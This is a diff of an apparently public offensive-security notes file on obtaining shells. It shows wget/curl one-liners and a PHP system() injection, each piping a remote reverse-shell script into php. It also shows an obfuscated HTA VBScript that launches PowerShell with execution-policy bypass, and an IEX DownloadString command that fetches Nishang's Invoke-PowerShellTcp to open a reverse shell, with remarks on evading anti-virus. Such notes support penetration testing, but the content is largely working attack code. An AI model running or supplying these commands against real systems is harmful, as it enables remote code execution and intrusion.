Qazeer/InfoSec-Notes/General/Shells.md

 wget -qO- http://<WEBSERVER_IP>:<WEBSERVER_PORT>/php-reverse-shell.php | php

 # Through PHP code injection
 # The system call be replaced with various PHP functionalities detailed above.
 system('curl http://<WEBSERVER_IP>:<WEBSERVER_PORT>/php-reverse-shell.php | php')
 system('wget -qO- http://<WEBSERVER_IP>:<WEBSERVER_PORT>/php-reverse-shell.php | php')
 ```

 ###### [Windows] HTML Application

+Windows `HTML Application (HTA)` file are `HTML` based and may contain
-Windows HTML Application script can contain JavaScript or VBScript that will be
-interpreted by the operating system.
+`JavaScript` or `VBScript` that will be interpreted by the Windows operating

-The HTA script can be interpreted through `Internet Explorer` or the Windows
+system.
+More precisely, the `HTA` script can be interpreted through
-engine `mshta.exe`.
-As the file is not written on disk but directly
+`Internet Explorer` or the Windows engine `mshta.exe`.
+As the file is not
-interpreted from the remote URL, this technique can be used to bypass
+written on disk but directly interpreted from the remote URL, this technique
-some anti-virus solutions.
+can be used to bypass some anti-virus solutions (statement that does not hold
+as true now).

-The following HTA script can be used to load in memory and execute the
+The following `HTA` script can be used to execute some PowerShell code (such
-`Nishang` `PowerShell`'s `Invoke-PowerShellTcp` cmdlet:
+as loading in memory and executing a PowerShell script).
+As the 32-bit version
+of `mshta.exe` seems to be executed by default, be aware that it will by
+default execute the 32-bit version of PowerShell.
+Even if the
+`C:\Windows\System32` path is specified, it will be mapped to
+`C:\Windows\SysWOW64` (for compatibility reasons).
+To force the 64-bit version
+of PowerShell to executed (needed for 64-bit shellcode for instance), the
+`C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe` path should be
+specified.

 ```
+# <COMMAND> example: powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<WEBSERVER_IP>:<WEBSERVER_PORT>/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>

 <script language="VBScript">
   window.moveTo -4000, -4000
   Set eWZ3pL4 = CreateObject("Wscript.Shell")
   Set gOhlGr = CreateObject("Scripting.FileSystemObject")
   For each path in Split(eWZ3pL4.ExpandEnvironmentStrings("%PSModulePath%"),";")
     If gOhlGr.FileExists(path + "\..\powershell.exe") Then
-      eWZ3pL4.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<WEBSERVER_IP>:<WEBSERVER_PORT>/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>",0
+      eWZ3pL4.Run "<COMMAND>",0
       Exit For
     End If
   Next